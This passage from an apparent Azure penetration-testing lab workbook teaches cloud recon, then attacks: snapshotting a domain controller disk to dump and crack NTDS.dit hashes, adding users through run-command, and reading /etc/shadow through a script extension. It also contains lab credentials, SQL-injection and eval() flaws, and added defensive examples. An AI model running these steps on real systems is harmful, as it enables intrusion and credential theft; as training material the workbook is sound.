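    for name, entry in summarize(SAMPLE_ASSIGNMENTS).items():
        flag = "!!" if entry["privileged"] else "  "
        for role, level, scope in entry["roles"]:
            print(f"{flag} {name:20} {entry['type']:17} {role:28} {level:15} {scope}")
    print("chase first:", privileged_principals(SAMPLE_ASSIGNMENTS))
```

Pass the real file with json.load() and the same functions apply; the service principal with Owner at subscription scope is the kind of finding that decides where the rest of the engagement goes.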

Internal Recon with AZ Tools

Let's talk about internal reconnaissance. How do we know what the most critical assets and items are? Let's try and
figure out a methodology to understand them. First, let's see if we can enumerate virtual machines:

$ az vm list -o table --resource-group <class-subdomain>-resources

Let's manipulate the query to show us:

1. The name of the virtual machine
2. The resource group of the machine
3. The provisioning state of the virtual machine
4. The virtual machine hardware size

$ az vm list --query '[].{Name:name,ResourceGroup:resourceGroup,ProvisioningState:provisioningState,VMSize:hardwareProfile.vmSize}' -o table --resource-group <class-subdomain>-resources

It would appear that this environment has a few machines. Some of them are Standard_DS2_V2, and there may be other
sizes as well. You may see names such as dc1 and iis that are clues, but they are not necessarily a domain
controller or IIS server.

Now, compute instances can have disks attached to them that form the hard disk of the machine. We can list these
disks and see them all:

$ az disk list -o table --resource-group <class-subdomain>-resources

You can see which of these disks exist. In our case it's one disk per machine, but it could be more; there could even
be orphaned disks. Keep this in mind when looking over these disks.

Compute instances have a few options: one option is to back up the entire VM and another option is to use snapshots.
We can list backups and snapshots using the Azure tool if they exist. If they don't exist, with enough permissions
you can create one.

$ az snapshot list --resource-group <class-subdomain>-resources

What we see here is a snapshot called dc1-disk. This is potentially a snapshot of the domain controller disk. Given
enough rights, we may be able to get a copy of this disk and pull out domain controller artifacts.

Now how do we see backups? Backups are stored in a vault. To see the backups you need two pieces: first you need the
vault name, and you need the resource group. To get the resource groups we are working with, you could use the
following command again:

$ az vm list -o table --resource-group <class-subdomain>-resources

To get the name of the vaults, we can list all vaults:

$ az backup vault list --resource-group <class-subdomain>-resources

Here we can list all the vaults and get the name of the vault we want to look at. Armed with this information we can
construct our query:

$ az backup item list --resource-group <class-subdomain>-resources --vault-name <vault name from vault list command>


Understanding the limitations of our tools

While we have been using az exclusively, not all functions are exposed to az directly. Let's begin by opening Firefox,
found on the desktop.

From here let's open a URL:

https://portal.azure.com

From here you will be asked to sign in. You can use the summer@sec588.com account. At the top, in the search bar,
type the following: Azure AD Domain Services.

Click the sec588.com line and it will open a tree about the object. We cannot make any major changes to AD Domain
Services, but we can see that there is a configuration for it. This is an example of how the portal is slightly
different from the CLI tools.

Conclusion

This lab is the beginning of a cursory tour of the az tool. The tool itself can be wielded for legitimate system
administration, but also for our own use in a penetration test if we understand how to navigate the system. Just like
the aws tool, the az tool works at the control plane layer and can circumvent some of the traditional controls we
may have put into a system.

Why this lab is important

Over the next few labs, we will be using this tool to implement our actions. Getting familiar with how to use the tool
for reconnaissance gathering, listing of permissions and more will be critical.

Additional Resources

SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)

Lab 3.2: API's and Postman

Brief Intro

While we have seen the ways that Azure and Amazon expose their APIs through CLI tools, we can also interact with
many of these environments with the native SDKs. This lab will introduce us to using the Azure API in Postman, and
by doing so we will:

1. Learn how the OAuth flow in Azure works, so that we can later leverage it to find a higher privileged account.
2. See how the OAuth token flow leads us to a bearer token. We can later use this type of access for items like
Microsoft Graph.
3. Learn how to use Postman to import a collection.

Requirements for This Lab

This lab requires the student to have:

The az CLI installed and working
The Firefox browser installed and working
The Postman application

Try It Yourself

If you wish to try this on your own:

1. Use az login to log in via a web browser and through the CLI.
2. Create a client secret for the Postman-API app registration that is located in Azure AD. You can use the jerry
account to do this.
3. Download the JSON requests from: http://bit.ly/2TPlWRO
4. Use the tools to obtain a valid access_token for authentication.
5. See what level of authorization the token has against the API.

Walkthrough

Let's open the MATE terminal so that we can launch az.

Once the terminal is open, type the following command:

$ az login

Once you log in, you will not be returned to the terminal; you need to manually click on it to see the successful
login.

Log in with the jerry account this time. Record the tenantId value.

Username: jerry@sec588.com
Password: HumanMusic2019

From this point we will use the Firefox application to navigate the Azure Portal.

Log into: https://portal.azure.com

Using the Azure Portal search options, type the following:

Azure Active Directory

From here locate the menu option for App Registrations.

Look for the application called Postman-API.

Click on the application. Record the following values:

Application (client) ID:

Directory (tenant) ID:

From here we will now need to create a client secret to be able to connect our Postman into our system.

Click the Certificates and Secrets button.

In this screen click New Client Secret.

Call the secret: StudentX-Secret.

Make it expire in 1 Year.

Important: when you click Add you will see the secret ONLY ONCE; copy the value NOW. The secret you add is a new
credential on a shared app registration, so remove it when the lab is over.

With these values we can now configure Postman.

Open a new browser tab and go to the following URL:

http://bit.ly/2TPlWRO

The URL above has a lowercase L and the letter O, NOT the number zero.

When asked, choose Check out the WebView.

From here RIGHT CLICK Download the JSON and choose Save Link As...

Save it to your Desktop as Azure Rest.JSON.

Now let's open Postman.

Let's open the MATE terminal so that we can launch Postman.

From here type:

$ cd /opt/postman

$ ./Postman

Once Postman is open we will now import the specified JSON.

Choose File -> Import.

Click Choose Files.

Click the Desktop button and choose Azure Rest.JSON.

You should now see a folder on the left called Azure Rest.

To log into Azure we will need to perform an OAuth 2.0 token request. This will be a two step operation. In the first
step we will use the collection's token request, which posts the client ID, client secret and resource to the tenant's
token endpoint (the client credentials grant), to get an access token. That token will be our bearer token for
making valid API requests.

Click on the left hand side under the Azure REST folder: Get AAD Token.

Click on the Body button (or tab, depending on how you view this). At this point we should be able to see the body of
the request. The body shows us that we need several environment variables.

You should see a dropdown containing the words 'No Environment' at the top right-hand side of the screen. Click the
eyeball next to it.

Under Environment click Add on the right. We can now add an environment. Let's call it: Azure.

Add the following environment variables and fill in the CURRENT VALUE field:

tenantId        This is from the previous terminal area where we recorded it
clientId        This is the Application (client) ID of the Postman-API application
clientSecret    This is the student secret you created
subscriptionId  Leave this blank for now
bearerToken     Leave this blank for now
resource        This needs to be set to: https://management.azure.com as we will be testing access to this resource

Note the capitalization: the first word is all lowercase and the second word begins with an uppercase letter. Make
sure that none of the variables have spaces BEFORE or AFTER the word.

Select Add and then click the X at the top corner to close the Environments screen completely. The variables only
resolve when the Azure environment is selected in that dropdown.

Now click the tab for Tests.

Once you click Send you will see a response with an access_token.

Copy this value, and click the eyeball to enter it in as the bearerToken.

subscriptionId:

Now we will need to get a subscriptionId. To get this, open a terminal and type the following command:

az account show --query id

Go back into the environment variables and fill in the following values:

bearerToken     This is the access_token value. Because it has a dot (.) in it you cannot just double-click the value
                to copy it; you must highlight it.
subscriptionId  The value from the az account show command above.

Armed with these values we can now formulate a new API request. Underneath the request for Get AAD Token you should
see a Get Resource Groups request. Choose it.

Once it is open, click Headers. You will now see some unresolved variables. Let's input these.

Read the body of the response carefully:

{
  "error": {
    "code": "AuthorizationFailed"
  }
}

Please note, this is not Authentication failed, this is Authorization failed, which means authentication passed, but
you are not authorized to access this resource at this scope. The resource here is Azure Resource Manager
(management.azure.com), and the Postman-API application has not been granted a role on this subscription. Later
today we will be using these keys to access Office resources.

Conclusion

While this lab did not yield exploitation, it builds on the fact that today we will be using the Postman tool in a new
and different way. In order to successfully use the tool we need to understand how to build programmatic access to
Azure, and this lab demonstrates how to do this by obtaining an OAuth 2.0 access token and presenting it as a bearer
token.

Additional Resources

SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)

Lab 3.3: Azure VMs

Brief Intro

Using the capabilities of the system, we may be able to leverage the ability of Azure to back up and restore disks, to
abuse this process and obtain additional information about local resources. This lab demonstrates how to use the
system to gain access to hashes in the SAM database and the NTDS.DIT of a domain controller.

Requirements for This Lab

This lab requires a few items:

The az tool
The Storage Explorer tool
A login to the system using the password for the jerry account
A connection to the internet

Try It Yourself

To try this out yourself without any help:

1. Create a snapshot of the dc1-disk1 disk, labelling it with your number (student-X).
2. Convert that snapshot to a disk.
3. Mount that disk in a Linux virtual machine.
4. Use the secretsdump.py tool that ships with Impacket to extract the local administrator hash.

Walkthrough

Making Snapshots

Let's open the MATE terminal so that we can launch Azure Storage Explorer.

Once the terminal is open, type the following commands to launch Storage Explorer:

$ cd /opt/StorageExplorer

The Storage Explorer tool is an Electron-based tool, so it may take a few minutes to launch.

Please note Storage Explorer is not the most stable of applications and may require you to run the command more than
once. If you receive a .NET 2.2 error, run the application again.

$ ./StorageExplorer

Once this opens, log in as jerry.

If you need the account credentials, the username is jerry@sec588.com and the password is HumanMusic2019.

The Azure Storage Explorer is a menu-driven system where you can view storage blobs and storage environments. You
can look through the system and see what you have available to you.

Once you've explored a bit, let's navigate to the following location:

Pay-as-you-go-XXXX (jerry@sec588.com) | Disks | <class-subdomain>-resources

Here there are a few disks. Locate the one called dc1-disk1 and click the button at the top that says 'Create
Snapshot.' Call the snapshot:

dc1-disk1-student-X

Wait until the job is 'done'; this may take a few minutes.

Converting Snapshots to Disk

Once you have built a snapshot, you can attach this snapshot to a new system. This system could be Windows, or it
could be Linux. To facilitate future labs, and to give us as attackers potentially more options, we will be using a
Linux VM to facilitate our work.

Note: during a real engagement we may wish to hide our activities, and given the number of Windows vs. Linux systems
deployed we may choose to hide amongst the masses by using whatever is more common.

The first item is that we need to get the snapshot ID of our snapshot:

snapId=$(az snapshot show --name dc1-disk1-student-X --resource-group <class-subdomain>-resources --query [id] -o tsv)

To check if this command worked, use:

echo $snapId

The snapshot can be converted with the following command:

az disk create --resource-group <class-subdomain>-resources --name dc1-disk1-student-X-disk --sku Standard_LRS --size-gb 128 --source $snapId

With the disk available, we can now create a VM. Given enough permissions, we can create a VM and mount the disk.
What if this is just a backup/restore account? It would probably still have this capability.

Mounting the Disk in a VM

You may need to log in as jerry if you have not yet done this or your session has expired:

$ az login -u jerry@sec588.com -p HumanMusic2019

The next component of this will be to mount the disk to a VM. With the disk mounted we can run some attacks on it.
Could this potentially be a domain controller? If so, we can attempt to extract the ntds.dit file from it.

az vm create --name studentX-hack --attach-data-disk dc1-disk1-student-X-disk --admin-username studentX --resource-group <class-subdomain>-resources --public-ip-address-allocation dynamic --image ubuntults --generate-ssh-keys

Once the Virtual Machine is created, you can do the following:

A set of keys is created for you if they are not already on the system:

~/.ssh/id_rsa and ~/.ssh/id_rsa.pub

A Public IP Address for your VM is provided to you in the JSON array.

You should now be able to log in to the system by typing the following:

$ ssh StudentX@<publicIpAddress>

SecretsDump.py

Once we have a valid login to our VM, let's perform the following tasks:

1. Mount the disk to a directory
2. Download the secretsdump.py file
3. Run secretsdump against the target machine.

From within the VM, let's find the disk:

$ dmesg | grep sd

What this prints out is all of the SD (SCSI Drives) that are available. By default there are two that ship with this VM: sda and sdb. These are already mounted. Are there any others? The first available disk may be sdc.


At this point, we can, as root, create a mount directory and mount the SECOND sdc partition. Why the second? In modern Windows, for EFI purposes, the second partition is more than likely the C:\ drive.

To verify the contents of any disk in the future, perform an fdisk -l /dev/sdX, substituting X for the letter of the disk.

$ sudo mkdir /mnt/disk1

$ sudo mount /dev/sdc2 /mnt/disk1

The errors about the machine not being able to mount the disk cleanly, because the disk was not cleanly unmounted, can be safely ignored.

If you wish to validate that it is mounted, check the directory structure and make sure that Windows, WindowsAzure and AzureData exist:

$ ls /mnt/disk1/

Let's get secretsdump.py on our system. What is secretsdump.py? The secretsdump.py script is a tool that ships as part of Impacket. While Impacket has many features, it also has this tool that can attack live and offline systems, looking through the different files on the disk to extract hashes. What files? The SAM database, registry hives, and even ntds.dit.

Impacket requires the pip binary to be present on our system, which ships with the python-pip package.

$ sudo apt-get update -y && sudo apt install python-pip -y

Once installed, we can then pull down the impacket repository.

$ git clone https://github.com/SecureAuthCorp/impacket

This clones the impacket repository that contains secretsdump.py. We can now use pip to install impacket as a library for us to use the secretsdump.py script.

Switch directory into the directory that contains impacket:

$ cd impacket

To install impacket type:

~/impacket$ pip install .

The pip install takes a few minutes to build. Once done, you will then be able to drop into the examples directory:

~/impacket$ cd examples

~/impacket/example$

Extracting the Hashes

Here is the command that we can use to dump secrets:

~/impacket/example$ python secretsdump.py -system /mnt/disk1/Windows/System32/config/SYSTEM -ntds /mnt/disk1/Windows/NTDS/ntds.dit -outputfile /tmp/hashes -hashes LMHASH:NTHASH LOCAL

What do these switches do?

-system : The location of the SYSTEM hive
-ntds : The location of the ntds.dit file
LOCAL : This is a local system, not a remote system
-hashes : This is to output the hashes in the format LMHASH:NTHASH
-outputfile /tmp/hashes : The location to output the hashes to

Using this tool, we can now extract at least some hashes:

We at least now have the Administrator hashes to the VM, which may be used in other places or to get us further into the environment.

IF YOU HAVE TIME

Once you have hashes, you may wish to crack them with a password cracking tool. The password cracking tool used is john.

Copy the contents of /tmp/hashes.ntds to your local system. Even a clipboard copy is sufficient. The example below has you copying it to a file called /tmp/hashes on YOUR local system.

When complete, run the following commands:

/opt/johntheripper/john --format=NT --wordlist=/home/sec588/files/wordlists/rockyou.txt /tmp/hashes

You should now have a list of passwords used in these password dumps.

Conclusion

This lab provided you a way to look at how Storage and Backup operations can be abused to gain unauthorized access to a system. We performed an attack to show how to obtain the hashes themselves. Using the hashes to move around a network is a discussion for the SEC560 class environment. For now, this is a good roadmap for you to follow, given the right level of permissions.

Why this lab is important

This lab is important as quite often, systems administrators build a backup/restore capability somewhere in the system without thinking through the implications of such permissions. Does this account have the capability to snapshot a disk? Possibly. Does the account have the ability to verify and test the authenticity of the disk? Maybe. To expedite our labs, we did everything from within the cloud, but this does not mean that backing up a VHD and downloading it wouldn't also be possible. Keep this in mind when working on Azure environments.

Additional Resources

SANS SEC560: Network Penetration Testing and Ethical Hacking (http://www.sans.org/sec560)

Lab 3.4: Attacking Azure Functions

Brief Intro

While Microsoft Azure does provide 'Serverless' Functions, the type of functions that they support are starkly different from Amazon Lambda Functions. While Amazon Lambda functions are container-restricted functions that do not easily see other functions, the Microsoft Serverless functions are very different. The system uses an open source framework known as Project Kudu. The project is found on [https://github.com/projectkudu/kudu]. We are going to explore how Azure Functions work with each other and the differences in the system.

Requirements for This Lab

1. Only Firefox is required for this lab.

Try It Yourself

If you wish to try this on your own:

Log into the Azure Portal as Jerry@sec588.com

Find the Azure Functions area, and find the resource group called: shared-resource-group. The function app is called shared-resource-function-app.

You will notice that Functions is now using the new style of Functions, but we can switch this back to "classic experience".

Answer the following questions:

1. Which one of these functions has a Username and Password in the plaintext files?

2. Which directory within D:\home is used to store secrets, if any are listed?

3. Which function in the Manage area contains secrets from the Vault?

BONUS: There is a vulnerability in several of the functions. What are the vulnerabilities?

Challenge Area Walkthrough

Let's take a look at the dev site. Open up Firefox and navigate to [http://portal.azure.com].

We will log in with the jerry@sec588.com account, whose password is HumanMusic2019.

We will be exploring the Azure Functions. Type in the search bar:

Function

From here you will click on the shared-resource-function-app. This application has several 'Functions'. Click on the HttpTrigger3.

This particular Function is part of a larger 'application'. In the Lambda world this particular application would have isolated trigger functions. Let's explore how this is vastly different in Azure.

Click on the Console button on HTTPTrigger4. Here you will see that the application is hosted on the D:\ drive of the Azure Function application.

Let's explore what would happen if someone had command execution on this application.

Type the following command:

set

Notice that there are many environment variables on here. Let's see what other directories we can find.

Currently the user is in:

D:\home\site\wwwroot\HttpTrigger3

Type cd ..

If you type dir you will see all of the files in the repository.

Let's now look at the different output items:

Here you will see four trigger functions.

Your job is to answer the following questions ONLY using the console in the GUI, to simulate an attacker with command line injection in an application:

Remember that in Windows, type is the equivalent of cat.

1. Which one of these functions has a Username and Password in the plaintext files?
2. Which directory within D:\home is used to store secrets, if any are listed?
3. Which function in the Manage area contains secrets from the Vault? This one can be done in the GUI.

BONUS: There is a vulnerability in several of the functions. What are the vulnerabilities?

Answers

The answers below:

1. If you type the following file: D:\home\site\wwwroot\HttpTrigger1\index.js you will see a username and password at the top of the file.

2. D:\home\data\Functions\secrets is where the secrets are decrypted and stored.

3. If you use the GUI and navigate to HttpTrigger4 and then Manage, you will see two values: UsernameFromVault and PasswordFromVault. If the vault is used, these values will be decrypted.


4. There are 2 vulnerabilities:

SQL Injection in HttpTrigger1, specifically in this field:

var query = "select amount,date from purchases p " + "inner join cards c " + "on p.card_id = c.card_id " + "where c.cardNumber = '" + cardNum + "'";

In the NodeJS HttpTrigger3 there is an eval() on body statement that will cause Server Side JavaScript Injection (SSJI).

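The two defects named in the answer, each reproduced beside a hardened form, as an added example in dependency-free Node.js; it is not part of the workbook or of the lab's function code. Table and column names follow the snippet above, while the @cardNum named-parameter style and the single expected request field are assumptions.

```javascript
// Added example (not part of the SEC588 workbook or the lab's function code):
// the two defects from the answer above, each beside a hardened form, in
// dependency-free Node.js. Table/column names follow the workbook snippet;
// the @cardNum named-parameter style and the request field set are assumed.

// --- Defect 1: SQL injection via string concatenation (HttpTrigger1) ---

// Vulnerable: the card number is spliced into the SQL text, so a quote in
// the input changes the statement's structure instead of staying data.
function buildQueryUnsafe(cardNum) {
  return "select amount,date from purchases p " +
    "inner join cards c " +
    "on p.card_id = c.card_id " +
    "where c.cardNumber = '" + cardNum + "'";
}

// Hardened: constant statement text plus a separately bound parameter; the
// driver sends the value out of band, so it can never be parsed as SQL.
// Input validation is a second, independent layer, not a replacement.
function buildQueryParameterized(cardNum) {
  if (typeof cardNum !== "string" || !/^[0-9]{12,19}$/.test(cardNum)) {
    throw new TypeError("cardNum must be 12-19 digits");
  }
  return {
    text: "select amount,date from purchases p " +
      "inner join cards c " +
      "on p.card_id = c.card_id " +
      "where c.cardNumber = @cardNum",
    params: { cardNum },
  };
}

// --- Defect 2: eval() on the request body (HttpTrigger3, SSJI) ---

// Vulnerable: whatever the caller sends runs as JavaScript in the function
// host, which shares D:\home with every other function in the app.
function parseBodyUnsafe(body) {
  return eval("(" + body + ")");
}

// Hardened: JSON.parse builds data and never executes code, and the result
// is checked against the fields this function actually expects.
function parseBodySafe(body) {
  let data;
  try {
    data = JSON.parse(body);
  } catch (e) {
    throw new TypeError("body is not valid JSON");
  }
  if (data === null || typeof data !== "object" || Array.isArray(data)) {
    throw new TypeError("body must be a JSON object");
  }
  for (const key of Object.keys(data)) {
    if (key !== "cardNum") throw new TypeError("unexpected field: " + key);
  }
  return data;
}

// Constructed inputs: one well-formed card number and two hostile ones.
const GOOD_CARD = "4111111111111111";
const QUOTE_CARD = "x' or 'a'='a";    // closes the quoted literal early
const CODE_BODY = "{cardNum: 1 + 1}";  // a JS expression, not JSON

// Run both versions of each function over the inputs and return what the
// vulnerable and hardened paths each produce.
function demo() {
  const unsafeSql = buildQueryUnsafe(QUOTE_CARD);
  const safeSql = buildQueryParameterized(GOOD_CARD);
  let paramRejected = false;
  try { buildQueryParameterized(QUOTE_CARD); } catch (e) { paramRejected = true; }

  const evaluated = parseBodyUnsafe(CODE_BODY);   // the "1 + 1" actually ran
  let jsonRejected = false;
  try { parseBodySafe(CODE_BODY); } catch (e) { jsonRejected = true; }
  const parsed = parseBodySafe(JSON.stringify({ cardNum: GOOD_CARD }));

  return { unsafeSql, safeSql, paramRejected, evaluated, jsonRejected, parsed };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```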
Conclusion

This lab illustrates that once a serverless function in a singular application is compromised, the entire application will act like a monolithic application in terms of security. There is barely any access and authorization control between functions on the disk, and this is very different from other serverless functions that exist. This means that application architects need to keep this in mind and attackers need to understand how loose the restrictions are.

Additional Resources

SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)

Lab 3.5: Running Commands in a VM

Brief Intro

While running through an engagement or penetration test, you may find yourself wishing to run commands on a remote system. This course doesn't focus on the commands to run themselves, like a SEC560 or SEC660 course. While some courses may be looking at having you execute lateral movement between systems on the same WAN or LAN environment, this course focuses on alternative methods to run commands on remotely available cloud systems.

The techniques that we will focus on that are specific to Microsoft Azure are:

Extensions on remote systems
RunCommand and using PowerShell

There are also methods to do this with almost any cloud provider, as this is base functionality.

Requirements for This Lab

Internet access and access to our Azure Portal is required for this lab. The Virtual Machine from Lab 3.3 needs to still be available.

On Demand students should ensure they have this Virtual Machine available; if not, they should recreate it.

Try It Yourself

If you wish to try this on your own:

1. Use the run-command in the az CLI to execute a set of queries.
2. The queries execute a series of PowerShell cmdlets; tell me which directory the script executes from.
3. Execute a PowerShell script to add a user.
4. Execute the Custom Script Extension on the studentX-Hack VM. Use the Azure Portal to do this.
5. Execute a shell script; the shell script should be a bash script that runs an elevated command like cat /etc/shadow.

Walkthrough

CLI tools and run-command.

Let's open the MATE terminal so that we can launch az:

Once the terminal is open type the following commands:

Validate that you are logged in as Jerry:

$ az account show

If you are not, use the previous exercises to log in as jerry.

Let's validate that we can run the Azure commands to list out virtual machines:

$ az vm list -o table

We should see MULTIPLE machines, at a minimum:

1. The DC
2. An IIS Server
3. A Dockerhost
4. One or more Student VMs

Let us explore the run-command option that is presented to us.

If we execute the command below, we will see options that can be arguments to the command. Some of these are far more attractive to us than other arguments.

$ az vm run-command

How does run-command work? The az vm run-command has a list of commands that can be run; there is a limited set of options.

RunPowerShellScript : Runs a PowerShell script
EnableRemotePS : Enable Remote PowerShell
EnableAdminAccount : Checks if the Local Admin Account is available; if it is, enable it
IPConfig : Runs ipconfig
RDPSettings : Changes the RDP Settings to enable it or suggest a change
ResetRDPCert : Resets the RDP Certificate to a new one
SetRDPPort : Changes the RDP Port

Of all these commands, a few may be of interest: RunPowerShellScript and EnableRemotePS.

Given that we have the right to make specific changes, we have the potential to apply the extension labeled RunPowerShellScript, which would provide us a mechanism to execute PowerShell remotely. There is a bevy of scripts that we can run.

One option? How about if we run powercat.ps1? Maybe we can use PowerShell Empire? Some of these options may trip host-based EDR. If you are interested in either tool, navigate to:

PowerCat PS1 (https://github.com/besimorhino/powercat)
PowerShell Empire (https://github.com/BC-SECURITY/Empire/)

What's another option? How about if we run some simple commands to prove the power of the system.

1. List the current directory
2. Add a StudentX user

Let's see the syntax of the command:

az vm run-command invoke --command-id RunPowerShellScript --name dc1 -g <class-subdomain>-resources --script '$scriptDir = Get-Location; Write-Host "Current Dir is $scriptDir"'

This command does the following:

--name dc1 : Run it on dc1
-g <class-subdomain>-resources : Our class resource group
--command-id RunPowerShellScript : Option to run a PowerShell script
--script ' ' : Anything that follows --script runs in PowerShell.

Executing this command takes a few minutes; the output is returned in JSON:

We can see that the command executes from a specific directory:

C:\\Packages\\Plugins\\Microsoft.CPlat.Core.RunCommandWindows\\1.1.3\\Downloads

Are we running these commands in an elevated way? Remember, you want to change your studentX account to your student number.

az vm run-command invoke --command-id RunPowerShellScript --name dc1 -g <class-subdomain>-resources --script 'net.exe user studentX Passw0rd123 /add'

The azure vm run-command will also take a while, but it should be successful, as shown below:

Using the Azure Portal to use the Custom Script Extensions

Custom script extensions can be run from the command prompt, but the experience is very cumbersome. You have to create a specific <xml> file that has a particular format.

Note: in the latest Azure portal this has slightly changed, so the Windows CLI is a bit simpler.

Let's try and use the Jerry account to perform these actions through the Azure portal.

Log in to the Azure Portal; open Firefox by clicking on the Desktop:

From the Azure Search area, type Virtual Machines.


Once you get to the Virtual Machine area, look at the different machines. Let's explore dc1 by clicking it. In the settings area choose Extensions.

There is an existing script extension called create-active-directory-forest. This particular script will set up Active Directory; it uses the PowerShell custom module. You can click on it and see the results, but you cannot actually add another PowerShell extension. Only one module can be attached to a machine. You could uninstall the module, but we may break our lab, so let's not do this.

Running our own custom extensions

Navigate back to the computers list. From here, choose your computer, the one you called studentX-Hack. This computer was created in Lab 3.3. Once you have this computer clicked, choose Extensions.


The next thing is to click Add. But what will we add? Since this is a Linux computer instance, we cannot run PowerShell, but we can run bash. If the run-command runs as an elevated user in Windows, does this script run as root?

Let's choose Custom Script for Linux. Let's click Create. The new Azure Portal has a new mechanism to create a Linux script or any custom script. This system uses the Azure File Storage Blob. Click Browse.


We navigate to our Storage Container for this lab. The storage account name is:

sec588sharedstorageacct

Inside, it contains a folder called scripts. Click into that folder.

This folder has a script called script.sh

![Student-X](pics/lab3.5/lab3-5-vm-extensions-storage-directory.png)

Make sure you click the checkbox and click the word select.

This script contains the following lines:

#!/bin/bash

cat /etc/shadow

Clicking the CustomScript button once done, you should see the output of the command.

This takes a few minutes to execute.

Notice that the return is in a JSON array.

If you have extra time

Load the StorageExplorer:

/opt/StorageExplorer/StorageExplorer

Once it is loaded, you can navigate to the folder with these scripts:

sec588sharedstorageacct

You can upload your scripts to try different attacks.


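The defender's view of both techniques in this lab, the run-command invocations against dc1 and the Custom Script Extension written to the student VM, as an added example that is not from the workbook: a small Node.js triage pass over constructed Azure Activity Log records. The record shape (operationName.value, caller, resourceId, status.value, eventTimestamp) assumes the Activity Log REST/portal schema, and the subscription id, resource group and timestamps are placeholders.

```javascript
// Added example (not part of the SEC588 workbook). It shows the control-plane
// trail that "az vm run-command invoke" and a Custom Script Extension install
// leave in the Azure Activity Log, and triages a constructed batch of records.
//
// Assumption: records use the Activity Log REST/portal shape (operationName
// .value, caller, resourceId, status.value, eventTimestamp). Event Hub and
// Storage exports use different casing; map them to this shape first.

// Resource-provider operation ids that execute code on a guest VM through the
// control plane (the labels on the right are ours).
const CODE_EXEC_OPERATIONS = {
  "microsoft.compute/virtualmachines/runcommand/action": "run-command invoke",
  "microsoft.compute/virtualmachines/extensions/write": "extension install/update",
};

// Constructed sample records mirroring what the lab's steps would produce:
// Jerry's RunPowerShellScript calls against dc1, the Custom Script for Linux
// extension written to the student VM, and one routine operation as noise.
// The subscription id and resource group are placeholders.
const SUB = "/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/class-resources";
const SAMPLE_RECORDS = [
  { eventTimestamp: "2020-07-28T14:02:11Z", caller: "jerry@sec588.com",
    operationName: { value: "Microsoft.Compute/virtualMachines/runCommand/action" },
    resourceId: SUB + "/providers/Microsoft.Compute/virtualMachines/dc1",
    status: { value: "Succeeded" } },
  { eventTimestamp: "2020-07-28T14:09:45Z", caller: "jerry@sec588.com",
    operationName: { value: "Microsoft.Compute/virtualMachines/runCommand/action" },
    resourceId: SUB + "/providers/Microsoft.Compute/virtualMachines/dc1",
    status: { value: "Succeeded" } },
  { eventTimestamp: "2020-07-28T14:31:02Z", caller: "jerry@sec588.com",
    operationName: { value: "Microsoft.Compute/virtualMachines/extensions/write" },
    resourceId: SUB + "/providers/Microsoft.Compute/virtualMachines/studentX-hack/extensions/CustomScript",
    status: { value: "Succeeded" } },
  { eventTimestamp: "2020-07-28T14:33:40Z", caller: "jerry@sec588.com",
    operationName: { value: "Microsoft.Compute/virtualMachines/start/action" },
    resourceId: SUB + "/providers/Microsoft.Compute/virtualMachines/dc1",
    status: { value: "Succeeded" } },
];

// Pull the VM name out of a resource id. Extension writes nest one level
// deeper, so the VM is always the segment after "virtualMachines".
function vmNameFromResourceId(resourceId) {
  const parts = resourceId.split("/");
  const i = parts.findIndex((p) => p.toLowerCase() === "virtualmachines");
  return i >= 0 && parts[i + 1] ? parts[i + 1] : null;
}

// Keep only records whose operation executes code on a guest and flatten
// them into findings a SIEM rule or a reviewer can sort through.
function findCodeExecution(records) {
  const findings = [];
  for (const r of records) {
    const op = ((r.operationName && r.operationName.value) || "").toLowerCase();
    const label = CODE_EXEC_OPERATIONS[op];
    if (!label) continue;
    findings.push({
      time: r.eventTimestamp,
      caller: r.caller,
      vm: vmNameFromResourceId(r.resourceId),
      technique: label,
      succeeded: !!(r.status && r.status.value === "Succeeded"),
    });
  }
  return findings;
}

// Summarise per caller: how many VMs they executed code on and by which
// techniques. A backup, helpdesk or contributor identity reaching a domain
// controller this way is the signal to review, since the command runs as
// SYSTEM on Windows and root on Linux.
function summariseByCaller(findings) {
  const byCaller = {};
  for (const f of findings) {
    const s = byCaller[f.caller] ||
      (byCaller[f.caller] = { vms: new Set(), techniques: new Set(), count: 0 });
    s.count += 1;
    if (f.vm) s.vms.add(f.vm);
    s.techniques.add(f.technique);
  }
  return Object.fromEntries(Object.entries(byCaller).map(([caller, s]) => [
    caller,
    { count: s.count, vms: [...s.vms].sort(), techniques: [...s.techniques].sort() },
  ]));
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(summariseByCaller(findCodeExecution(SAMPLE_RECORDS)), null, 2));
}
```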

Conclusion

In this lab we have shown you how to execute several commands in Azure; the commands we executed did not seem to be very special. Over the next few days we will go through which methods of execution prove most beneficial. However, at the moment the critical pieces were: in what context can we execute commands? Will those commands execute as an elevated user, which potentially could be a backdoor in the future?

Why this lab is important

We may find that we have existing running resources in Azure that we cannot access or turn off. The Azure VM is running, and rebooting it or snapshotting it may not yield us options. How can we execute commands? We have shown you two ways to execute backdoors on a live running system. These backdoors could be downloading and executing a backdoor through PowerShell or something else. We will provide you additional examples in upcoming sections.

Additional Resources

SANS SEC560: Network Penetration Testing and Ethical Hacking (https://www.sans.org/sec560)

Lab 3.6: Windows Containers

Brief Intro

One of the newest technologies that you will encounter in the cloud is containers. Windows Containers are very different from Linux containers. While some of the container technology was purpose built for hosting, the Windows Kernel is still being expanded to support containers better. The typical thought process for securing a container is not to run antivirus on the container host within the container, but to run it while it is stored in a Container Registry or before it gets pushed into a host. This means that if we can get a machine to execute one of our containers, we may find that the container can access any number of items in your environment that may be unexpected.

Requirements for This Lab

This lab requires the student to have:

The AZ CLI will need to be installed and working

Try It Yourself

If you wish to try this on your own:

1. List out container registry items.
2. Create a container; see if you can access it on port 80.
3. Attach to the container using the attach command.
4. Execute an evil attack, something obvious, standard mimikatz. There is a limitation in the shell... maybe use .log?
5. Check out the filesystem, specifically C:\\var

Walkthrough

Let's open the MATE terminal so that we can launch the Azure CLI


Once the terminal is open type the following commands:

Now there are a couple of caveats that Microsoft has outlined in this:

Restrictions

Azure Container Instances currently supports launching a single process with az container exec, and you cannot pass command arguments. For example, you cannot chain commands like in sh -c "echo FOO && echo BAR", or execute echo FOO.

Execute a command in a running Azure container instance (http://bit.ly/2tVpKXj)

This means that we can run powershell.exe or cmd.exe but we cannot run: "cmd.exe /c dir".

